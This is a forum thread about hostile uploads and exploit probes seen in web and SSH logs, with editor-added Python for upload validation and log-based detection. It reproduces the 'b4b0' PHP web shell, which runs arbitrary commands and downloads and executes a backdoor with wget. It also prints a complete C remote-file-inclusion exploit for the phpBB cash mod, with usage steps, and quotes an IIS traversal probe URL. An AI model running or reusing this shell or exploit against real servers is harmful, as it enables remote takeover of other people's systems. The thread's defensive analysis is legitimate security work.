1'm b4b0, w4tch m3 hax0r
-
From David ...
I have a form on my web page which allows users to upload files to it (wolever.net/Uploads), and I frequently get people uploading files like exploit.php, which are promptly piped to /dev/null. Of course, there are a few people who try uploading exploit.html and hoping it's parsed as PHP (which, of course, it's not) and I have had a couple of attempts to overwrite mod_autoindex with custom index.html files... also failures. This is one script I found particularly interesting though...
[b4b0.html]
b4b0 kickin ass again.......
System was exploited telnet to the port you have your backdoor set to listen on.
<?
if (isset($chdir)) @chdir($chdir);
ob_start();
system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
system("cd /tmp; wget url_to_backdoor;chmod +x gota1;./gota1"); // EDIT THIS INFO!!!!!!!!!!!!!
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>
[/b4b0.html]
Note the line which says EDIT THIS INFO.
-
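An added example from the editor, not David's upload script (the post does not show it): a Python upload check that would send exploit.php, exploit.html and a custom index.html to the bit bucket, each for a stated reason, and would store anything it accepts under a random name with no execute bit. The allowlist, the reserved names, the 2 MB cap and the sample bytes are constructed policy and data for this example, not anything from the thread.

```python
import os
import re
import secrets

# Constructed policy: only the file types the site wants, each checked by
# extension AND by leading bytes (magic numbers), so a renamed PHP file
# cannot pass as an image.
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
    "pdf": b"%PDF-",
}

# Names the web server treats specially (directory index, per-dir config);
# an upload must never be allowed to take one of them.
RESERVED_NAMES = {"index.html", "index.htm", "index.php", ".htaccess"}

# PHP open tags anywhere in the payload, e.g. a PNG with "<?php" appended in
# the hope that the server parses it. "<?xml" would also match, which is why
# XML/SVG types are deliberately absent from ALLOWED_TYPES above.
PHP_TAG = re.compile(rb"<\?(php|=)?|<script\b[^>]*language\s*=\s*['\"]?php",
                     re.IGNORECASE)


def check_upload(filename: str, data: bytes, max_bytes: int = 2_000_000):
    """Return (accepted, reason). Pure decision; touches no filesystem."""
    base = os.path.basename(filename)  # drop any directory components first
    if not base or base.lower() in RESERVED_NAMES:
        return False, "reserved or empty name"
    if len(data) > max_bytes:
        return False, "too large"
    # Only the LAST extension counts: "shell.php.png" is examined as png and
    # then fails the magic-byte or embedded-tag check if it is really PHP.
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    magic = ALLOWED_TYPES.get(ext)
    if magic is None:
        return False, f"extension .{ext or '(none)'} not allowed"
    if not data.startswith(magic):
        return False, "content does not match declared type"
    if PHP_TAG.search(data):
        return False, "embedded PHP tag"
    return True, "ok"


def storage_name(filename: str) -> str:
    """Random on-disk name that keeps only the vetted extension, so the
    client-supplied name never reaches the filesystem."""
    ext = os.path.basename(filename).rsplit(".", 1)[-1].lower()
    return f"{secrets.token_hex(16)}.{ext}"


def save_upload(filename: str, data: bytes, upload_dir: str):
    """Write an accepted upload into upload_dir with no execute bit.
    Assumption: upload_dir is served as static content only, or not at all."""
    ok, reason = check_upload(filename, data)
    if not ok:
        return None, reason
    path = os.path.join(upload_dir, storage_name(filename))
    with open(path, "wb") as fh:
        fh.write(data)
    os.chmod(path, 0o640)  # assumption: the web server reads via group
    return path, "ok"
```

The three checks are deliberately independent: the extension allowlist stops exploit.php and exploit.html, the reserved-name set stops the index.html overwrite attempts, and the magic-byte plus embedded-tag scan stops a real image with PHP appended. Storing under a random name outside the document root is what makes the first check survive a future server misconfiguration.
-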
That's great .... quite a hacker!
-
People seem to think that this URL will work to hack my apache on a Linux box...
/scripts/..%255c%255c../winnt/system32/cmd.exe
hmm yeah right.
Also they try the Too Long URL exploit that works on old versions of IIS... LOL
Drak
-
@Drak said:
People seem to think that this URL will work to hack my apache on a Linux box...
Those are just scripted worm attacks so they are just "trying their luck".
-
L053r5 is what they are [:P]
Almost all are probably kiddies on the same provider as I am anyway.
Drak
-
Also, it is possible with many web services (www, smtp, whatever) to
put whatever "banner" string they want for incoming connections.
So therefore, people have IIS installs saying they are apache, and vice
versa. As a result of this, port scanners and script kiddie tools
generally have options to ignore host banners and attempt all known
exploits of ANY provider on that port.
-
As far as server logs go, I used to look at my apache log with
amusement, seeing many entries like the one mentioned above. I'm
pretty confident in my apache install, so I really don't even look at
that file anymore...
The other entertaining log is the SSH connection log. On a daily
basis, 1 or more people using spoofed IP addresses attempt to log in
with a static set of about 20 usernames and passwords. Same 20
every time. It has to be part of some script kiddie toolkit or
something, since I can't imagine the same person trying the same
combination every day to see if maybe I finally DID create a user named
"admin" with a password of "password". This has been
ongoing for over a year.
-
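An added example, written by the editor rather than by the poster above, of the detection logic behind the "same 20 usernames every day" observation: it parses OpenSSH failed-login lines, flags any source that fails a threshold number of times inside a sliding window (the fail2ban idea), and reports the usernames that recur on every day present in the log. The auth.log lines, addresses, year and thresholds are all constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed auth.log excerpt in OpenSSH syslog format (not from the thread).
SAMPLE_AUTH_LOG = """\
Mar 10 04:12:01 host sshd[2001]: Failed password for invalid user admin from 203.0.113.5 port 40212 ssh2
Mar 10 04:12:03 host sshd[2002]: Failed password for invalid user test from 203.0.113.5 port 40213 ssh2
Mar 10 04:12:05 host sshd[2003]: Failed password for root from 203.0.113.5 port 40214 ssh2
Mar 10 04:12:07 host sshd[2004]: Failed password for invalid user guest from 203.0.113.5 port 40215 ssh2
Mar 10 04:12:09 host sshd[2005]: Failed password for invalid user oracle from 203.0.113.5 port 40216 ssh2
Mar 10 04:15:00 host sshd[2010]: Failed password for dave from 198.51.100.7 port 51000 ssh2
Mar 10 04:15:20 host sshd[2011]: Accepted password for dave from 198.51.100.7 port 51001 ssh2
Mar 11 04:12:02 host sshd[3001]: Failed password for invalid user admin from 203.0.113.5 port 40300 ssh2
"""

FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_failed(lines, year=2004):
    """Yield (timestamp, username, source_ip) for each failed-login line.
    syslog omits the year, so the caller supplies it (assumed 2004 here)."""
    for line in lines:
        m = FAILED.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["user"], m["ip"]


def brute_force_sources(lines, threshold=5, window_seconds=60):
    """Return {ip: [usernames tried, in order]} for every source that reached
    `threshold` failures inside any `window_seconds` span. One deque of
    timestamps per source gives a sliding window without re-scanning."""
    recent = defaultdict(deque)
    tried = defaultdict(list)
    flagged = {}
    for ts, user, ip in sorted(parse_failed(lines)):
        q = recent[ip]
        q.append(ts)
        tried[ip].append(user)
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()  # drop failures that fell out of the window
        if len(q) >= threshold:
            flagged[ip] = tried[ip]
    return flagged


def recurring_usernames(lines):
    """Usernames tried on every day present in the log: the fixed wordlist
    signature of a scripted scanner, as opposed to a one-off typo."""
    by_day = defaultdict(set)
    for ts, user, _ip in parse_failed(lines):
        by_day[ts.date()].add(user)
    if not by_day:
        return set()
    return set.intersection(*by_day.values())
```

A single failed password from a legitimate user never crosses the threshold, while a scripted run of five or more usernames within a minute does; the recurring-username view is the evidence that it is the same toolkit returning, since the wordlist does not change between days.
-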
I love this guy: http://www.gulftech.org/tools/base64.pl
Not only is he referring to Base64 "Encryption", he also logs everyone's conversions into a file in /tools/. Some of the things people are "Encrypting" are pretty funny ;)
-
Actually, Blue, I didn't take the lines from my log file. It's number 20 of the 20 most often requested non-existent pages in my statistics. [:D]
I remember killing off my FTP server because 2 people were doing a hack attempt using things like 'administrator,system' etc as username and password. I reported their IP to their ISP and they got an official warning. If they ever do it again their connection will be terminated. Muhahaha. That'll teach them.
Drak
-
You're lucky in that regard - my script kiddies spoof their IP address, so I have no idea who to complain to...
About 6 months ago, I saw some that did appear to reverse-map, and did
complain. Never got a single response from any of the ISPs I
contacted. (none were major ISPs)
-
In my case it probably helped having the most expensive non-business subscription for my ISP.
Hey any clue to find out from the apache logs where all the hits to an image that I USED to have, but no longer have, are coming from? I think someone has used it on a forum as an avatar, but I cannot seem to find it on any of the referring pages that I can see in the statistics.
Drak
-
I don't know of any tool that does it, but if you know the image
filename, it should be quite easy. Do an egrep using a regular
expression that either includes all lines with that image filename, or
to be more specific, lines with that image filename and a 404 result.
HTH
-
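As an added example (the editor's, not code from any poster), here is a Python pass over constructed Apache combined-format log lines that serves two earlier points in the thread: Drak's scripted probes (the /scripts/..%255c%255c../winnt/system32/cmd.exe request and the Too Long URL attempt) and the egrep suggestion just above for finding where hits to a removed image come from. It decodes nested percent-encoding so that %255c is seen as a backslash before the traversal check, flags IIS-only payloads and over-long URIs, and aggregates Referer values for 404 hits on a named file. The log lines, hostnames and the 1024-byte URI limit are all constructed for this example.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed Apache "combined" log lines; none are from the thread's servers.
SAMPLE_ACCESS_LOG = """\
203.0.113.9 - - [10/Mar/2004:04:00:01 +0000] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294 "-" "-"
203.0.113.9 - - [10/Mar/2004:04:00:02 +0000] "GET /default.ida?XXXXXXXXXXXXXX HTTP/1.0" 404 294 "-" "-"
198.51.100.4 - - [10/Mar/2004:09:12:44 +0000] "GET /images/old_logo.gif HTTP/1.1" 404 210 "http://forum.example.net/viewtopic.php?t=1" "Mozilla/4.0"
198.51.100.5 - - [10/Mar/2004:09:13:10 +0000] "GET /images/old_logo.gif HTTP/1.1" 404 210 "http://forum.example.net/viewtopic.php?t=1" "Mozilla/4.0"
198.51.100.6 - - [10/Mar/2004:09:20:00 +0000] "GET /images/old_logo.gif HTTP/1.1" 404 210 "http://other.example.org/page.html" "Mozilla/4.0"
192.0.2.10 - - [10/Mar/2004:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)


def parse(lines):
    """Yield one dict per well-formed combined-format line."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def fully_decode(s, rounds=3):
    """Undo nested percent-encoding (%255c -> %5c -> \\), bounded so a
    pathological input cannot keep us decoding forever."""
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s


def probe_reasons(path, max_len=1024):
    """List the reasons a request path looks like an automated exploit probe;
    an empty list means it looks clean."""
    reasons = []
    decoded = fully_decode(path)
    if len(path) > max_len:
        reasons.append("oversized request URI")
    if re.search(r"(\.\./|\.\.\\)", decoded):
        reasons.append("directory traversal after decoding")
    if re.search(r"(cmd\.exe|/winnt/|\.ida\b)", decoded, re.IGNORECASE):
        reasons.append("Windows/IIS payload against a non-IIS host")
    return reasons


def scripted_probes(lines):
    """{source_ip: set(reasons)} for every source sending exploit-shaped requests."""
    out = {}
    for rec in parse(lines):
        r = probe_reasons(rec["path"])
        if r:
            out.setdefault(rec["ip"], set()).update(r)
    return out


def referers_for_missing(lines, filename):
    """Counter of Referer values for 404 hits on a file that no longer exists,
    i.e. who is still embedding or hot-linking it."""
    c = Counter()
    for rec in parse(lines):
        if rec["status"] == "404" and rec["path"].endswith(filename):
            c[rec["referer"]] += 1
    return c
```

The decoding step is the part an egrep on the raw line misses: a single-pass filter for "../" never sees the traversal inside "..%255c", which is exactly why that encoding was used against IIS. For the removed-image question, the same parse gives the Referer column directly, so the most common referer in the 404 hits is the page that still embeds the file.
-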
Hello,
Here is what it actually is, from b4b0-phpBB.tgz. This is a phpBB cashmod exploit. You also might wanna do some research on bahbo before you start jumping to conclusions. Whoever attempted to use this on you was a moron and should not be allowed to use a computer....
Cheers,
evilrabbi
/* b4b0.php */
b4b0 kickin ass again.......
System was exploited telnet to the port you have your backdoor set to listen on.
<?
if (isset($chdir)) @chdir($chdir);
ob_start();
system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
system("cd /tmp; wget url_to_backdoor;chmod +x backdoor_name;./backdoor_name"); // EDIT THIS INFO!!!!!!!!!!!!!
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>
/* code for mass exploitation */
/*
exploit for phpBB 1.0.0 - 2.0.10
edit the b4b0.php file with the correct url to your backdoor and the correct filename for your backdoor upload it to
a webserver.
gcc -o b4b0-phpbb b4b0-phpbb.c
./b4b0-phpbb <url_to_system> <phpbb_dir> <url_to_b4b0.php>
telnet <url_of_exploited_system> <port_of_back_door>
greets to b4b0
-- evilrabbi
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

void help(char *program_name);

int main(int argc, char *argv[]) {
    struct sockaddr_in trg;
    struct hostent *he;
    int sockfd, buff;
    char buffer[1024];
    char *request;

    if(argc != 4 ) {
        help(argv[0]);
        exit(0);
    }
    he = gethostbyname(argv[1]);
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    request = (char *) malloc(1024);
    trg.sin_family = AF_INET;
    trg.sin_port = htons(80);
    trg.sin_addr = *((struct in_addr *) he->h_addr);
    memset(&(trg.sin_zero), '\0', 8);
    connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr));
    sprintf(request,"GET http://%s/%s/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://%s?cmd=w\n",argv[1],argv[2],argv[3]);
    send(sockfd,request,strlen(request),0);
    buff=recv(sockfd, buffer, 1024-1, 0);
    buffer[buff] = '\0';
    printf("%s",buffer);
    close(sockfd);
    return 0;
}

void help(char *program_name) {
    printf("b4b0-phpbb.c by evilrabbi for b4b0\n\n");
    printf("%s hostname phpbb2_dir url_to_bad_php\n",program_name);
    printf("%s www.example.com phpBB2 blah.com/b4b0.php.php\n",program_name);
}
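An added example by the editor, not part of evilrabbi's post and not phpBB code: the request the exploit above sends sets phpbb_root_path to a URL the attacker controls, and the cash mod then builds an include path from that value, so the remote b4b0.php is fetched and executed on the board's server. The Python below is the check that closes that class of hole in any language, applied to the same parameter: refuse any URL scheme, resolve the candidate path, and require the result to stay inside the application directory. The base directory /srv/www/phpBB2 and the included file name are assumptions chosen for illustration.

```python
import os
from urllib.parse import parse_qs, urlsplit

# Assumed application root for the example; a real deployment passes its own.
APP_ROOT = "/srv/www/phpBB2"


def resolve_include(root_param, allowed_base=APP_ROOT,
                    filename="admin/pagestart.php"):
    """Return the absolute file to include, or None if the caller-supplied
    root would pull code from a URL or from outside the application tree.
    `filename` stands in for whatever the module appends to the root."""
    # 1. Any scheme (http:, ftp:, data:) or a scheme-relative "//host" is a
    #    remote include request: refuse before touching the filesystem.
    if urlsplit(root_param).scheme or root_param.startswith("//"):
        return None
    # 2. Canonicalise both sides so "..", "." and symlinks cannot fool the
    #    comparison. os.path.join discards `base` if root_param is absolute,
    #    which the containment check below then catches.
    base = os.path.realpath(allowed_base)
    candidate = os.path.realpath(os.path.join(base, root_param, filename))
    # 3. Containment: the resolved file must lie under the resolved base.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def audit_request(query, allowed_base=APP_ROOT, param="phpbb_root_path"):
    """Map each value of `param` in a request query string to the include
    resolve_include would allow (None = would have been an RFI)."""
    values = parse_qs(query).get(param, [])
    return {v: resolve_include(v, allowed_base) for v in values}
```

Applied to the query string the C program builds (setmodules=1&phpbb_root_path=http://...), audit_request returns None for the attacker's value, while a plain relative root such as "./" resolves to the expected file under the application directory. Disallowing URL includes at the interpreter level (allow_url_include=Off in PHP) is the belt to this check's braces; neither alone is enough, since a traversal value with no scheme still escapes the tree.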